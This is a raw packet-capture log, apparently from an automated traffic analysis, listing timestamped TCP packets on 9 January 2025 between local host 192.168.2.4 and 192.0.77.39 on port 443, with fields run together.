                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.308862925 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.308870077 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.308906078 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.309520006 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.309696913 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.309732914 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.309740067 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314467907 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314511061 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314548969 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314553022 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314563990 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314613104 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314613104 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314623117 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314668894 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.314815044 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.315269947 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.315295935 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.315318108 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.315325022 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.315361023 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.316845894 CET44349746192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.316890955 CET44349746192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.316931963 CET49746443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.317435980 CET49746443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.317447901 CET44349746192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.317754984 CET49759443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.317789078 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.317853928 CET49759443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.318166018 CET49759443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.318178892 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.319161892 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.344247103 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.344336033 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.344343901 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.355571985 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.355585098 CET49744443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.370841026 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.370848894 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385628939 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385771990 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385797024 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385823011 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385831118 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385871887 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.385972977 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386162996 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386192083 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386205912 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386212111 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386245966 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386250973 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386862040 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386889935 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386909962 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386915922 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.386951923 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387016058 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387056112 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387767076 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387799025 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387815952 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387820959 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387846947 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387861013 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387865067 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387886047 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387903929 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387909889 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.387945890 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.388549089 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.389856100 CET44349744192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.389975071 CET44349744192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.390017986 CET49744443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.390260935 CET49744443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.390269041 CET44349744192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.390666962 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.390693903 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.390744925 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.391329050 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.391340971 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395446062 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395522118 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395554066 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395570993 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395584106 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395625114 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395631075 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395742893 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395776987 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395777941 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395787001 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395828009 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.395833015 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396431923 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396477938 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396485090 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396868944 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396910906 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396914959 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396925926 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396966934 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.396971941 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397341967 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397373915 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397388935 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397397041 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397435904 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397443056 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397619009 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397660017 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.397666931 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403053999 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403079987 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403105021 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403115034 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403125048 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403156996 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403564930 CET49749443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403579950 CET44349749192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403789997 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403809071 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.403863907 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.407320023 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.407326937 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.430998087 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.431047916 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.431067944 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.431077003 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.431124926 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.436793089 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.436798096 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.440186024 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.440246105 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.440252066 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472371101 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472425938 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472433090 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472532034 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472573996 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472579956 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472910881 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472918034 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472975016 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.472978115 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.473021984 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.473400116 CET49747443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.473407984 CET44349747192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.473830938 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.473861933 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.473921061 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.474678993 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.474692106 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.481966972 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482032061 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482079029 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482085943 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482273102 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482314110 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482321024 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482660055 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482711077 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482717991 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482760906 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482786894 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.482836962 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.483230114 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.483280897 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.483411074 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.483458996 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484091997 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484155893 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484304905 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484357119 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484364033 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484375000 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.484405041 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.485012054 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.485068083 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.485137939 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.485191107 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.485901117 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.485958099 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.486088991 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.486138105 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.517746925 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.517812014 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580651999 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580699921 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580725908 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580739021 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580765963 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580790043 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580790043 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.580840111 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.581020117 CET49745443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.581028938 CET44349745192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.581332922 CET49763443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.581346035 CET44349763192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.581412077 CET49763443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.582103014 CET49763443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.582113981 CET44349763192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.823771954 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.824073076 CET49759443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.824088097 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.824364901 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.824935913 CET49759443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.824991941 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.825073004 CET49759443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.827383995 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.827548981 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.827558994 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.827831984 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.828099966 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.828150988 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.828186989 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.867347956 CET44349759192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.875332117 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.878302097 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.913594961 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.913779020 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.913815975 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.913829088 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.913937092 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.913952112 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.914707899 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.914766073 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.914942026 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.914997101 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915083885 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915138960 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915330887 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915390968 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915467024 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915472984 CET44349761192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915503025 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.915508032 CET44349760192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.956963062 CET49761443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.956964016 CET49760443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.971424103 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.971632957 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.971642017 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.972486019 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.972543001 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.972851038 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.972903967 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.972963095 CET49762443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.972970009 CET44349762192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002583981 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002633095 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002659082 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002682924 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002684116 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002695084 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002716064 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002718925 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002748966 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002756119 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002760887 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.002795935 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.003205061 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.003346920 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.003369093 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.003390074 CET49758443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.003396988 CET44349758192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.003437996 CET49758443192.168.2.4192.0.77.39
